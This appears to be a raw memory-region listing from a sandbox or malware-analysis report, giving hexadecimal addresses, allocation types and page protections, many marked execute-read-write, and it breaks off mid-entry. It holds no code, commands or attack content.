direct allocation
page execute and read and write
BA17000
direct allocation
page execute and read and write
B4B9000
direct allocation
page execute and read and write
B252000
direct allocation
page execute and read and write
B088000
direct allocation
page execute and read and write
5130000
remote allocation
page execute and read and write
B718000
direct allocation
page execute and read and write
BA87000
direct allocation
page execute and read and write
B5C6000
direct allocation
page execute and read and write
B5CD000
direct allocation
page execute and read and write
A60C000
direct allocation
page execute and read and write
BC60000
direct allocation
page execute and read and write
256B0000
trusted library allocation
page read and write
B816000
direct allocation
page execute and read and write
24A90000
trusted library allocation
page read and write
54C6000
trusted library allocation
page read and write
B88A000
direct allocation
page execute and read and write
B0E4000
direct allocation
page execute and read and write
24EB0000
trusted library allocation
page read and write
ADC8000
direct allocation
page execute and read and write
24670000
trusted library allocation
page read and write
25060000
trusted library allocation
page read and write
A9B0000
direct allocation
page execute and read and write
25060000
trusted library allocation
page read and write
B79E000
direct allocation
page execute and read and write
24B64000
heap
page read and write
24C80000
trusted library allocation
page read and write
BA27000
direct allocation
page execute and read and write
7850000
heap
page read and write
BDCF000
direct allocation
page execute and read and write
B0B0000
direct allocation
page execute and read and write
B300000
direct allocation
page execute and read and write
ABA4000
direct allocation
page execute and read and write
BB12000
direct allocation
page execute and read and write
B6C3000
direct allocation
page execute and read and write
A894000
direct allocation
page execute and read and write
BEDC000
direct allocation
page execute and read and write
B021000
direct allocation
page execute and read and write
B062000
direct allocation
page execute and read and write
B7AB000
direct allocation
page execute and read and write
21B0D000
stack
page read and write
23FA0000
trusted library allocation
page read and write
240B0000
trusted library allocation
page read and write
AE3C000
direct allocation
page execute and read and write
BF4D000
direct allocation
page execute and read and write
AE40000
direct allocation
page execute and read and write
24670000
trusted library allocation
page read and write
24C80000
trusted library allocation
page read and write
A767000
direct allocation
page execute and read and write
ADB8000
direct allocation
page execute and read and write
BA44000
direct allocation
page execute and read and write
21CD7000
stack
page read and write
B9DD000
direct allocation
page execute and read and write
25050000
trusted library allocation
page read and write
5320000
direct allocation
page read and write
24670000
trusted library allocation
page read and write
BDB3000
direct allocation
page execute and read and write
228F0000
heap
page execute and read and write
B0C4000
direct allocation
page execute and read and write
BC88000
direct allocation
page execute and read and write
256B0000
trusted library allocation
page read and write
AE34000
direct allocation
page execute and read and write
AF75000
direct allocation
page execute and read and write
B4E4000
direct allocation
page execute and read and write
42B000
unkown
page read and write
24CB0000
trusted library allocation
page read and write
24BDF000
heap
page read and write
AF92000
direct allocation
page execute and read and write
B870000
direct allocation
page execute and read and write
59A000
trusted library allocation
page execute and read and write
5624000
trusted library allocation
page read and write
24C80000
trusted library allocation
page read and write
B9F3000
direct allocation
page execute and read and write
256D0000
trusted library allocation
page read and write
B129000
direct allocation
page execute and read and write
24670000
trusted library allocation
page read and write
B388000
direct allocation
page execute and read and write
BFBD000
direct allocation
page execute and read and write
256D0000
trusted library allocation
page read and write
B8E5000
direct allocation
page execute and read and write
B903000
direct allocation
page execute and read and write
24670000
trusted library allocation
page read and write
64B0000
direct allocation
page read and write
25780000
trusted library allocation
page read and write
A7AC000
direct allocation
page execute and read and write
BCEE000
direct allocation
page execute and read and write
AE4C000
direct allocation
page execute and read and write
B100000
direct allocation
page execute and read and write
B1F6000
direct allocation
page execute and read and write
BD32000
direct allocation
page execute and read and write
21C40000
direct allocation
page read and write
BB67000
direct allocation
page execute and read and write
BCF8000
direct allocation
page execute and read and write
24AA0000
trusted library allocation
page read and write
24CC0000
trusted library allocation
page read and write
630000
heap
page read and write
BF7E000
direct allocation
page execute and read and write
AF12000
direct allocation
page execute and read and write
AFAA000
direct allocation
page execute and read and write
B70D000
direct allocation
page execute and read and write
23ECE000
stack
page read and write
8300000
heap
page read and write
23FA0000
trusted library allocation
page read and write
ABB9000
direct allocation
page execute and read and write
25780000
trusted library allocation
page read and write
B0E1000
direct allocation
page execute and read and write
B2C8000
direct allocation
page execute and read and write
8A99000
heap
page read and write
23FA0000
trusted library allocation
page read and write
24C80000
trusted library allocation
page read and write
AEBB000
direct allocation
page execute and read and write
22B62000
trusted library allocation
page read and write
B7B0000
direct allocation
page execute and read and write
24670000
trusted library allocation
page read and write
BCDA000
direct allocation
page execute and read and write
229B4000
trusted library allocation
page read and write
B29E000
direct allocation
page execute and read and write
B808000
direct allocation
page execute and read and write
23FA0000
trusted library allocation
page read and write
B79C000
direct allocation
page execute and read and write
BBF8000
direct allocation
page execute and read and write
240B0000
trusted library allocation
page read and write
24EB0000
trusted library allocation
page read and write
AFEB000
direct allocation
page execute and read and write
22C3D000
trusted library allocation
page read and write
AB21000
direct allocation
page execute and read and write
25700000
trusted library allocation
page read and write
B79E000
direct allocation
page execute and read and write
B3D4000
direct allocation
page execute and read and write
256D0000
trusted library allocation
page read and write
B79A000
direct allocation
page execute and read and write
BF11000
direct allocation
page execute and read and write
B9C7000
direct allocation
page execute and read and write
B8CF000
direct allocation
page execute and read and write
B3A2000
direct allocation
page execute and read and write
ADDB000
direct allocation
page execute and read and write
23F60000
trusted library allocation
page read and write
BFA4000
direct allocation
page execute and read and write
AE03000
direct allocation
page execute and read and write
74D5000
heap
page read and write
B96B000
direct allocation
page execute and read and write
32D1000
heap
page read and write
256D0000
trusted library allocation
page read and write
256B0000
trusted library allocation
page read and write
B4CC000
direct allocation
page execute and read and write
256B0000
trusted library allocation
page read and write
5170000
heap
page read and write
24CB0000
trusted library allocation
page read and write
B4CE000
direct allocation
page execute and read and write
21F78000
trusted library allocation
page read and write
24EB0000
trusted library allocation
page read and write
7CC0000
trusted library allocation
page read and write
BD78000
direct allocation
page execute and read and write
B3C8000
direct allocation
page execute and read and write
230F8000
trusted library allocation
page read and write
BE7C000
direct allocation
page execute and read and write
22EDE000
trusted library allocation
page read and write
A587000
direct allocation
page execute and read and write
230FC000
trusted library allocation
page read and write
B060000
direct allocation
page execute and read and write
BF55000
direct allocation
page execute and read and write
256B0000
trusted library allocation
page read and write
240B0000
trusted library allocation
page read and write
24D50000
trusted library allocation
page read and write
24C80000
trusted library allocation
page read and write
24990000
heap
page read and write
24670000
trusted library allocation
page read and write
65BD000
heap
page read and write
B4E6000
direct allocation
page execute and read and write
B297000
direct allocation
page execute and read and write
B784000
direct allocation
page execute and read and write
65EA000
heap
page read and write
BCCB000
direct allocation
page execute and read and write
24190000
trusted library allocation
page execute and read and write
B364000
direct allocation
page execute and read and write
625000
heap
page read and write
B4F4000
direct allocation
page execute and read and write
BEE0000
direct allocation
page execute and read and write
23FA0000
trusted library allocation
page read and write
21FB6000
trusted library allocation
page read and write
AD0B000
direct allocation
page execute and read and write
24670000
trusted library allocation
page read and write
B624000
direct allocation
page execute and read and write
AC82000
direct allocation
page execute and read and write
B0D5000
direct allocation
page execute and read and write
2409E000
stack
page read and write
256B0000
trusted library allocation
page read and write
AFFA000
direct allocation
page execute and read and write
23F50000
trusted library allocation
page read and write
23F20000
trusted library allocation
page read and write
B9E7000
direct allocation
page execute and read and write
256D0000
trusted library allocation
page read and write
BA6D000
direct allocation
page execute and read and write
256D0000
trusted library allocation
page read and write
ACAC000
direct allocation
page execute and read and write
21FF1000
trusted library allocation
page read and write
B442000
direct allocation
page execute and read and write
B223000
direct allocation
page execute and read and write
BD34000
direct allocation
page execute and read and write
7C50000
trusted library allocation
page read and write
AF79000
direct allocation
page execute and read and write
22BFA000
trusted library allocation
page read and write
B7A2000
direct allocation
page execute and read and write
228D0000
heap
page execute and read and write
BA84000
direct allocation
page execute and read and write
24C80000
trusted library allocation
page read and write
BC00000
direct allocation
page execute and read and write
B453000
direct allocation
page execute and read and write
24D44000
trusted library allocation
page read and write
B409000
direct allocation
page execute and read and write
256D0000
trusted library allocation
page read and write
ACCC000
direct allocation
page execute and read and write
B814000
direct allocation
page execute and read and write
BCA3000
direct allocation
page execute and read and write
22690000
direct allocation
page read and write
B0B2000
direct allocation
page execute and read and write
B22E000
direct allocation
page execute and read and write
24C80000
trusted library allocation
page read and write
70FD000
heap
page read and write
BAA5000
direct allocation
page execute and read and write
24670000
trusted library allocation
page read and write
BA75000
direct allocation
page execute and read and write
B032000
direct allocation
page execute and read and write
B938000
direct allocation
page execute and read and write
23F30000
trusted library allocation
page read and write
226A0000
direct allocation
page read and write
24D40000
trusted library allocation
page read and write
BD86000
direct allocation
page execute and read and write
BF9A000
direct allocation
page execute and read and write
23197000
trusted library allocation
page read and write
B661000
direct allocation
page execute and read and write
B083000
direct allocation
page execute and read and write
B3B6000
direct allocation
page execute and read and write
256D0000
trusted library allocation
page read and write
2F50000
heap
page read and write
256D0000
trusted library allocation
page read and write
24C80000
trusted library allocation
page read and write
AAA1000
direct allocation
page execute and read and write
B1F7000
direct allocation
page execute and read and write
256A0000
trusted library allocation
page execute and read and write
23F40000
trusted library allocation
page read and write
AFB3000
direct allocation
page execute and read and write
B4F9000
direct allocation
page execute and read and write
22A93000
trusted library allocation
page read and write
7850000
trusted library allocation
page execute and read and write
A7D9000
direct allocation
page execute and read and write
24EB0000
trusted library allocation
page read and write
B7BA000
direct allocation
page execute and read and write
B427000
direct allocation
page execute and read and write
B103000
direct allocation
page execute and read and write
B308000
direct allocation
page execute and read and write
7487000
heap
page read and write
24C80000
trusted library allocation
page read and write
B10D000
direct allocation
page execute and read and write
B82A000
direct allocation
page execute and read and write
B1C7000
direct allocation
page execute and read and write
407000
unkown
page readonly
23F40000
trusted library allocation
page read and write
B6A8000
direct allocation
page execute and read and write
22CC1000
trusted library allocation
page read and write
6FB0000
direct allocation
page read and write
796B000
stack
page read and write
22E50000
trusted library allocation
page read and write
23FB0000
trusted library allocation
page read and write
23C8F000
trusted library allocation
page read and write
5A2000
trusted library allocation
page read and write
BB5B000
direct allocation
page execute and read and write
241B0000
heap
page read and write
88F0000
heap
page read and write
B4B6000
direct allocation
page execute and read and write
30FE000
stack
page read and write
BAA3000
direct allocation
page execute and read and write
651D000
trusted library allocation
page read and write
B5DF000
direct allocation
page execute and read and write
BDDA000
direct allocation
page execute and read and write
24FBF000
stack
page read and write
B271000
direct allocation
page execute and read and write
AE01000
direct allocation
page execute and read and write
AF64000
direct allocation
page execute and read and write
BAFC000
direct allocation
page execute and read and write
861C000
heap
page read and write
220CC000
trusted library allocation
page read and write
240B0000
trusted library allocation
page read and write
B63C000
direct allocation
page execute and read and write
A7BD000
direct allocation
page execute and read and write
240B0000
trusted library allocation
page read and write
BAD4000
direct allocation
page execute and read and write
22DFF000
trusted library allocation
page read and write
24EB0000
trusted library allocation
page read and write
B3C3000
direct allocation
page execute and read and write
23BBF000
trusted library allocation
page read and write
BCE4000
direct allocation
page execute and read and write
84B2000
heap
page read and write
AF58000
direct allocation
page execute and read and write
BB1F000
direct allocation
page execute and read and write
B392000
direct allocation
page execute and read and write
257A0000
trusted library allocation
page read and write
8C40000
trusted library allocation
page execute and read and write
94D0000
heap
page read and write
B8C9000
direct allocation
page execute and read and write
BA57000
direct allocation
page execute and read and write
24C80000
trusted library allocation
page read and write
2EB6000
heap
page read and write
76C0000
trusted library allocation
page read and write
B006000
direct allocation
page execute and read and write
B927000
direct allocation
page execute and read and write
AF56000
direct allocation
page execute and read and write
24EB0000
trusted library allocation
page read and write
52E0000
direct allocation
page read and write
BBD4000
direct allocation
page execute and read and write
BCEC000
direct allocation
page execute and read and write
AFCC000
direct allocation
page execute and read and write
24B60000
trusted library allocation
page read and write
5EA1000
trusted library allocation
page read and write
256D0000
trusted library allocation
page read and write
7881000
heap
page read and write
BBDB000
direct allocation
page execute and read and write
74BE000
heap
page read and write
B8ED000
direct allocation
page execute and read and write
B329000
direct allocation
page execute and read and write
20EE000
stack
page read and write
BD0B000
direct allocation
page execute and read and write
B5DA000
direct allocation
page execute and read and write
B7EF000
direct allocation
page execute and read and write
BD0F000
direct allocation
page execute and read and write
240B0000
trusted library allocation
page read and write
BB27000
direct allocation
page execute and read and write
84E8000
heap
page read and write
BCAB000
direct allocation
page execute and read and write
78CF000
heap
page read and write
6EE0000
direct allocation
page read and write
312E000
stack
page read and write
B1E5000
direct allocation
page execute and read and write
BA67000
direct allocation
page execute and read and write
B14E000
direct allocation
page execute and read and write
B1BB000
direct allocation
page execute and read and write
BA63000
direct allocation
page execute and read and write
B91F000
direct allocation
page execute and read and write
24C80000
trusted library allocation
page read and write
5B30000
trusted library allocation
page read and write
B1C9000
direct allocation
page execute and read and write
25780000
trusted library allocation
page read and write
B800000
direct allocation
page execute and read and write
BD81000
direct allocation
page execute and read and write
B38E000
direct allocation
page execute and read and write
ABC8000
direct allocation
page execute and read and write
B14A000
direct allocation
page execute and read and write
B9D9000
direct allocation
page execute and read and write
A8BF000
direct allocation
page execute and read and write
B08B000
direct allocation
page execute and read and write
78A0000
trusted library allocation
page read and write
BA6B000
direct allocation
page execute and read and write
23F30000
trusted library allocation
page read and write
240A0000
trusted library allocation
page read and write
B02D000
direct allocation
page execute and read and write
B58B000
direct allocation
page execute and read and write
BDA9000
direct allocation
page execute and read and write
23FA0000
trusted library allocation
page read and write
256D0000
trusted library allocation
page read and write
BA2C000
direct allocation
page execute and read and write
256B0000
trusted library allocation
page read and write
B3A8000
direct allocation
page execute and read and write
22ACA000
trusted library allocation
page read and write
23B8F000
trusted library allocation
page read and write
BA4D000
direct allocation
page execute and read and write
ABE4000
direct allocation
page execute and read and write
B259000
direct allocation
page execute and read and write
B195000
direct allocation
page execute and read and write
BD55000
direct allocation
page execute and read and write
B45F000
direct allocation
page execute and read and write
24C90000
trusted library allocation
page read and write
BE86000
direct allocation
page execute and read and write
B50C000
direct allocation
page execute and read and write
BBAD000
direct allocation
page execute and read and write
BD2A000
direct allocation
page execute and read and write
B6BD000
direct allocation
page execute and read and write
23FA0000
trusted library allocation
page read and write
240A4000
trusted library allocation
page read and write
3455000
trusted library allocation
page execute and read and write
AEA2000
direct allocation
page execute and read and write
BB7F000
direct allocation
page execute and read and write
2FD0000
heap
page read and write
BCEB000
direct allocation
page execute and read and write
B1E7000
direct allocation
page execute and read and write
AF45000
direct allocation
page execute and read and write
BDF7000
direct allocation
page execute and read and write
256B0000
trusted library allocation
page read and write
B830000
direct allocation
page execute and read and write
B45B000
direct allocation
page execute and read and write
B6E5000
direct allocation
page execute and read and write
23CE2000
trusted library allocation
page read and write
220EC000
trusted library allocation
page read and write
AF61000
direct allocation
page execute and read and write
BEB4000
direct allocation
page execute and read and write
24C80000
trusted library allocation
page read and write
AE98000
direct allocation
page execute and read and write
7F910000
trusted library allocation
page execute and read and write
256B0000
trusted library allocation
page read and write
B347000
direct allocation
page execute and read and write
24EB0000
trusted library allocation
page read and write
24670000
trusted library allocation
page read and write
BC11000
direct allocation
page execute and read and write
B8F9000
direct allocation
page execute and read and write
23FB0000
trusted library allocation
page read and write
AF27000
direct allocation
page execute and read and write
B5E8000
direct allocation
page execute and read and write
AE8C000
direct allocation
page execute and read and write
23FA0000
trusted library allocation
page read and write
5179000
heap
page read and write
24EB0000
trusted library allocation
page read and write
BCF9000
direct allocation
page execute and read and write
8820000
heap
page read and write
BD2E000
direct allocation
page execute and read and write
AD85000
direct allocation
page execute and read and write
22B6D000
trusted library allocation
page read and write
3C60000
remote allocation
page execute and read and write
BBF0000
direct allocation
page execute and read and write
27B0000
heap
page read and write
B111000
direct allocation
page execute and read and write
B139000
direct allocation
page execute and read and write
BF9E000
direct allocation
page execute and read and write
AF67000
direct allocation
page execute and read and write
6530000
direct allocation
page read and write
B36F000
direct allocation
page execute and read and write
B14C000
direct allocation
page execute and read and write
AE53000
direct allocation
page execute and read and write
64E0000
direct allocation
page read and write
B8E9000
direct allocation
page execute and read and write
BD75000
direct allocation
page execute and read and write
B86C000
direct allocation
page execute and read and write
B6E7000
direct allocation
page execute and read and write
7020000
direct allocation
page read and write
24C90000
trusted library allocation
page read and write
AF75000
direct allocation
page execute and read and write
7EF000
stack
page read and write
A814000
direct allocation
page execute and read and write
23FA0000
trusted library allocation
page read and write
3230000
heap
page read and write
ACB7000
direct allocation
page execute and read and write
B977000
direct allocation
page execute and read and write
6F80000
direct allocation
page read and write
B081000
direct allocation
page execute and read and write
B44F000
direct allocation
page execute and read and write
B152000
direct allocation
page execute and read and write
B9E5000
direct allocation
page execute and read and write
B46B000
direct allocation
page execute and read and write
BEA1000
direct allocation
page execute and read and write
8A7B000
heap
page read and write
8491000
heap
page read and write
BB25000
direct allocation
page execute and read and write
B568000
direct allocation
page execute and read and write
BD40000
direct allocation
page execute and read and write
AF94000
direct allocation
page execute and read and write
B703000
direct allocation
page execute and read and write
24DA0000
trusted library allocation
page read and write
24EC0000
trusted library allocation
page read and write
23FA0000
trusted library allocation
page read and write
B284000
direct allocation
page execute and read and write
AF89000
direct allocation
page execute and read and write
B7DC000
direct allocation
page execute and read and write
B051000
direct allocation
page execute and read and write
B26F000
direct allocation
page execute and read and write
23BC7000
trusted library allocation
page read and write
2F94000
trusted library allocation
page read and write
B502000
direct allocation
page execute and read and write
8622000
heap
page read and write
256D0000
trusted library allocation
page read and write
B5F2000
direct allocation
page execute and read and write
B019000
direct allocation
page execute and read and write
A585000
direct allocation
page execute and read and write
BE6F000
direct allocation
page execute and read and write
B16B000
direct allocation
page execute and read and write
23B2F000
trusted library allocation
page read and write
5300000
direct allocation
page read and write
BD0D000
direct allocation
page execute and read and write
B596000
direct allocation
page execute and read and write
4F3000
heap
page read and write
B794000
direct allocation
page execute and read and write
BA88000
direct allocation
page execute and read and write
BCF4000
direct allocation
page execute and read and write
22BAA000
trusted library allocation
page read and write
BFBF000
direct allocation
page execute and read and write
65F1000
heap
page read and write
70FD000
heap
page read and write
24EC0000
trusted library allocation
page read and write
BC83000
direct allocation
page execute and read and write
229C4000
trusted library allocation
page read and write
B3BA000
direct allocation
page execute and read and write
B806000
direct allocation
page execute and read and write
8840000
trusted library allocation
page read and write
AF1D000
direct allocation
page execute and read and write
240A0000
trusted library allocation
page read and write
6867000
heap
page read and write
2FD8000
heap
page read and write
240B0000
trusted library allocation
page read and write
22C90000
trusted library allocation
page read and write
8450000
heap
page read and write
BDF5000
direct allocation
page execute and read and write
BDA7000
direct allocation
page execute and read and write
23C13000
trusted library allocation
page read and write
31EC000
stack
page read and write
A9D4000
direct allocation
page execute and read and write
24E6E000
stack
page read and write
AEBB000
direct allocation
page execute and read and write
321A000
trusted library allocation
page execute and read and write
B0EA000
direct allocation
page execute and read and write
B535000
direct allocation
page execute and read and write
23FA0000
trusted library allocation
page read and write
24B60000
heap
page read and write
B8F5000
direct allocation
page execute and read and write
B832000
direct allocation
page execute and read and write
256C0000
trusted library allocation
page read and write
31F0000
trusted library section
page read and write
22B12000
trusted library allocation
page read and write
BDD5000
direct allocation
page execute and read and write
B84A000
direct allocation
page execute and read and write
AE1C000
direct allocation
page execute and read and write
B8B5000
direct allocation
page execute and read and write
23FA0000
trusted library allocation
page read and write
7730000
heap
page execute and read and write
B79C000
direct allocation
page execute and read and write
B140000
direct allocation
page execute and read and write
BA51000
direct allocation
page execute and read and write
B058000
direct allocation
page execute and read and write
B250000
direct allocation
page execute and read and write
70B5000
heap
page read and write
B349000
direct allocation
page execute and read and write
24C80000
trusted library allocation
page read and write
23FA0000
trusted library allocation
page read and write
24DB0000
trusted library allocation
page read and write
AD99000
direct allocation
page execute and read and write
24EB0000
trusted library allocation
page read and write
B6AE000
direct allocation
page execute and read and write
B07F000
direct allocation
page execute and read and write
B1D4000
direct allocation
page execute and read and write
B5EE000
direct allocation
page execute and read and write
B65A000
direct allocation
page execute and read and write
B7ED000
direct allocation
page execute and read and write
7EE58000
trusted library allocation
page execute and read and write
AAF6000
direct allocation
page execute and read and write
6508000
trusted library allocation
page read and write
BA8A000
direct allocation
page execute and read and write
AB41000
direct allocation
page execute and read and write
24EB0000
trusted library allocation
page read and write
B3A4000
direct allocation
page execute and read and write
B506000
direct allocation
page execute and read and write
2410E000
stack
page read and write
BAEB000
direct allocation
page execute and read and write
3210000
trusted library allocation
page read and write
B701000
direct allocation
page execute and read and write
BD02000
direct allocation
page execute and read and write
B9DF000
direct allocation
page execute and read and write
B7D8000
direct allocation
page execute and read and write
25040000
trusted library allocation
page read and write
25050000
trusted library allocation
page read and write
ACEE000
direct allocation
page execute and read and write
AEDA000
direct allocation
page execute and read and write
AFD6000
direct allocation
page execute and read and write
B557000
direct allocation
page execute and read and write
21E3C000
trusted library allocation
page read and write
24C80000
trusted library allocation
page read and write
7C60000
trusted library allocation
page read and write
BCB7000
direct allocation
page execute and read and write
B60B000
direct allocation
page execute and read and write
87E5000
trusted library allocation
page read and write
24EB0000
trusted library allocation
page read and write
580000
trusted library allocation
page read and write
24EB0000
trusted library allocation
page read and write
5340000
direct allocation
page read and write
BB5F000
direct allocation
page execute and read and write
AC0F000
direct allocation
page execute and read and write
BAE9000
direct allocation
page execute and read and write
B5E2000
direct allocation
page execute and read and write
256D0000
trusted library allocation
page read and write
B11E000
direct allocation
page execute and read and write
22C93000
trusted library allocation
page read and write
240B0000
trusted library allocation
page read and write
B0F8000
direct allocation
page execute and read and write
8CB0000
heap
page read and write
8AF0000
trusted library allocation
page read and write
AB1C000
direct allocation
page execute and read and write
B6DD000
direct allocation
page execute and read and write
24EB0000
trusted library allocation
page read and write
ADD8000
direct allocation
page execute and read and write
BC6A000
direct allocation
page execute and read and write
B5BF000
direct allocation
page execute and read and write
24EB0000
trusted library allocation
page read and write
23FB0000
trusted library allocation
page read and write
24D30000
trusted library allocation
page read and write
23FA0000
trusted library allocation
page read and write
74E5000
heap
page read and write
B334000
direct allocation
page execute and read and write
BC1A000
direct allocation
page execute and read and write
B01D000
direct allocation
page execute and read and write
BEA9000
direct allocation
page execute and read and write
22B84000
trusted library allocation
page read and write
BA01000
direct allocation
page execute and read and write
25060000
trusted library allocation
page read and write
24C80000
trusted library allocation
page read and write
A874000
direct allocation
page execute and read and write
B6AB000
direct allocation
page execute and read and write
87DE000
stack
page read and write
A7C1000
direct allocation
page execute and read and write
24A90000
trusted library allocation
page read and write
B295000
direct allocation
page execute and read and write
B4B1000
direct allocation
page execute and read and write
401000
unkown
page execute read
8800000
trusted library allocation
page read and write
BEC8000
direct allocation
page execute and read and write
87F0000
trusted library allocation
page read and write
B6D4000
direct allocation
page execute and read and write
23FA0000
trusted library allocation
page read and write
8690000
trusted library allocation
page read and write
BDAB000
direct allocation
page execute and read and write
22C0C000
trusted library allocation
page read and write
22E11000
trusted library allocation
page read and write
777E000
stack
page read and write
24C80000
trusted library allocation
page read and write
BA61000
direct allocation
page execute and read and write
24EB0000
trusted library allocation
page read and write
19A000
stack
page read and write
ABEE000
direct allocation
page execute and read and write
25060000
trusted library allocation
page read and write
24A90000
trusted library allocation
page read and write
65D8000
heap
page read and write
256D0000
trusted library allocation
page read and write
B8A4000
direct allocation
page execute and read and write
25060000
trusted library allocation
page read and write
B84C000
direct allocation
page execute and read and write
256D0000
trusted library allocation
page read and write
2120000
heap
page read and write
65E8000
heap
page read and write
BAA0000
direct allocation
page execute and read and write
257B6000
trusted library allocation
page read and write
2430E000
heap
page read and write
B137000
direct allocation
page execute and read and write
23FA0000
trusted library allocation
page read and write
24670000
trusted library allocation
page read and write
ADA6000
direct allocation
page execute and read and write
24670000
trusted library allocation
page read and write
B01F000
direct allocation
page execute and read and write
7260000
heap
page read and write
256D0000
trusted library allocation
page read and write
24EC0000
trusted library allocation
page read and write
B230000
direct allocation
page execute and read and write
25060000
trusted library allocation
page read and write
6F40000
direct allocation
page read and write
24C80000
trusted library allocation
page read and write
B82D000
direct allocation
page execute and read and write
24EB0000
trusted library allocation
page read and write
AE50000
direct allocation
page execute and read and write
87A0000
trusted library allocation
page execute and read and write
A950000
direct allocation
page execute and read and write
63F0000
direct allocation
page read and write
23BC2000
trusted library allocation
page read and write
24CB0000
trusted library allocation
page read and write
23FA0000
trusted library allocation
page read and write
BF9C000
direct allocation
page execute and read and write
B8A0000
direct allocation
page execute and read and write
256D0000
trusted library allocation
page read and write
BA6B000
direct allocation
page execute and read and write
B925000
direct allocation
page execute and read and write
B109000
direct allocation
page execute and read and write
B38C000
direct allocation
page execute and read and write
ACC7000
direct allocation
page execute and read and write
B55B000
direct allocation
page execute and read and write
23FA0000
trusted library allocation
page read and write
257E2000
trusted library allocation
page read and write
23FA0000
trusted library allocation
page read and write
B9A9000
direct allocation
page execute and read and write
BE3F000
direct allocation
page execute and read and write
BCA0000
direct allocation
page execute and read and write
A756000
direct allocation
page execute and read and write
22A99000
trusted library allocation
page read and write
2FED000
trusted library allocation
page execute and read and write
434000
unkown
page read and write
B9D1000
direct allocation
page execute and read and write
ADB2000
direct allocation
page execute and read and write
BE41000
direct allocation
page execute and read and write
23F50000
trusted library allocation
page read and write
21DBC000
stack
page read and write
BD50000
direct allocation
page execute and read and write
24EB0000
trusted library allocation
page read and write
BCA5000
direct allocation
page execute and read and write
A8D0000
direct allocation
page execute and read and write
B57D000
direct allocation
page execute and read and write
AF9D000
direct allocation
page execute and read and write
242B0000
heap
page read and write
BA9A000
direct allocation
page execute and read and write
BA1D000
direct allocation
page execute and read and write
6E40000
heap
page read and write
7370000
direct allocation
page read and write
24EB0000
trusted library allocation
page read and write
B9B2000
direct allocation
page execute and read and write
2FA0000
trusted library allocation
page read and write
BC28000
direct allocation
page execute and read and write
AF66000
direct allocation
page execute and read and write
AC39000
direct allocation
page execute and read and write
240B0000
trusted library allocation
page read and write
23FB0000
trusted library allocation
page read and write
2494E000
stack
page read and write
B225000
direct allocation
page execute and read and write
24670000
trusted library allocation
page read and write
6FF0000
direct allocation
page read and write
B6E0000
direct allocation
page execute and read and write
BB83000
direct allocation
page execute and read and write
2236F000
stack
page read and write
23F10000
trusted library allocation
page read and write
242E5000
heap
page read and write
65E3000
heap
page read and write
B250000
direct allocation
page execute and read and write
BBD6000
direct allocation
page execute and read and write
24EB0000
trusted library allocation
page read and write
ACC3000
direct allocation
page execute and read and write
AFAC000
direct allocation
page execute and read and write
2430E000
heap
page read and write
B248000
direct allocation
page execute and read and write
24EB0000
trusted library allocation
page read and write
A972000
direct allocation
page execute and read and write
8AD2000
heap
page read and write
AF6D000
direct allocation
page execute and read and write
B4B8000
direct allocation
page execute and read and write
239EE000
trusted library allocation
page read and write
BE97000
direct allocation
page execute and read and write
BBC8000
direct allocation
page execute and read and write
24D30000
trusted library allocation
page read and write
B818000
direct allocation
page execute and read and write
AE48000
direct allocation
page execute and read and write
B664000
direct allocation
page execute and read and write
2A20000
trusted library allocation
page read and write
ABEA000
direct allocation
page execute and read and write
23BBD000
trusted library allocation
page read and write
24C80000
trusted library allocation
page read and write
AF85000
direct allocation
page execute and read and write
88B0000
trusted library allocation
page execute and read and write
6EF0000
direct allocation
page read and write
240B0000
trusted library allocation
page read and write
24CB0000
trusted library allocation
page read and write
A7EC000
direct allocation
page execute and read and write
7971000
heap
page read and write
B0FB000
direct allocation
page execute and read and write
70BD000
heap
page read and write
B5EC000
direct allocation
page execute and read and write
B4AF000
direct allocation
page execute and read and write
B3AE000
direct allocation
page execute and read and write
24CB0000
trusted library allocation
page read and write
22FF0000
trusted library allocation
page read and write
23FA0000
trusted library allocation
page read and write
256D0000
trusted library allocation
page read and write
256E0000
trusted library allocation
page read and write
24EB0000
trusted library allocation
page read and write
B5EB000
direct allocation
page execute and read and write
256F0000
trusted library allocation
page read and write
BCA7000
direct allocation
page execute and read and write
22600000
remote allocation
page read and write
B579000
direct allocation
page execute and read and write
229F5000
trusted library allocation
page read and write
21A4F000
stack
page read and write
22041000
trusted library allocation
page read and write
B479000
direct allocation
page execute and read and write
BD7A000
direct allocation
page execute and read and write
BA86000
direct allocation
page execute and read and write
567B000
trusted library allocation
page read and write
B782000
direct allocation
page execute and read and write
B3EC000
direct allocation
page execute and read and write
256D0000
trusted library allocation
page read and write
AD32000
direct allocation
page execute and read and write
21E94000
trusted library allocation
page read and write
627000
heap
page read and write
B2FC000
direct allocation
page execute and read and write
B461000
direct allocation
page execute and read and write
7EE40000
trusted library allocation
page execute and read and write
BA9E000
direct allocation
page execute and read and write
B17C000
direct allocation
page execute and read and write
B3C5000
direct allocation
page execute and read and write
8460000
heap
page read and write
256D0000
trusted library allocation
page read and write
B00D000
direct allocation
page execute and read and write
BAB8000
direct allocation
page execute and read and write
256D0000
trusted library allocation
page read and write
25700000
trusted library allocation
page read and write
24A90000
trusted library allocation
page read and write
2FC0000
trusted library allocation
page read and write
B4F7000
direct allocation
page execute and read and write
6FE0000
heap
page read and write
3295000
heap
page read and write
256B0000
trusted library allocation
page read and write
B4BB000
direct allocation
page execute and read and write
A872000
direct allocation
page execute and read and write
BC30000
direct allocation
page execute and read and write
B01B000
direct allocation
page execute and read and write
23FA0000
trusted library allocation
page read and write
BC42000
direct allocation
page execute and read and write
24C8F000
trusted library allocation
page read and write
2214A000
trusted library allocation
page read and write
256B0000
trusted library allocation
page read and write
240B0000
trusted library allocation
page read and write
B0C1000
direct allocation
page execute and read and write
256D0000
trusted library allocation
page read and write
B57B000
direct allocation
page execute and read and write
70A9000
heap
page read and write
3216000
trusted library allocation
page execute and read and write
B2E6000
direct allocation
page execute and read and write
24C80000
trusted library allocation
page read and write
B9AB000
direct allocation
page execute and read and write
B6B5000
direct allocation
page execute and read and write
3430000
trusted library allocation
page read and write
256B0000
trusted library allocation
page read and write
30E0000
trusted library allocation
page read and write
AE9A000
direct allocation
page execute and read and write
B51C000
direct allocation
page execute and read and write
240AA000
trusted library allocation
page read and write
B0BE000
direct allocation
page execute and read and write
AF73000
direct allocation
page execute and read and write
24EB0000
trusted library allocation
page read and write
B003000
direct allocation
page execute and read and write
6F70000
direct allocation
page read and write
BAAF000
direct allocation
page execute and read and write
AF7B000
direct allocation
page execute and read and write
B9F1000
direct allocation
page execute and read and write
23F30000
trusted library allocation
page read and write
B115000
direct allocation
page execute and read and write
B828000
direct allocation
page execute and read and write
B4AA000
direct allocation
page execute and read and write
AA05000
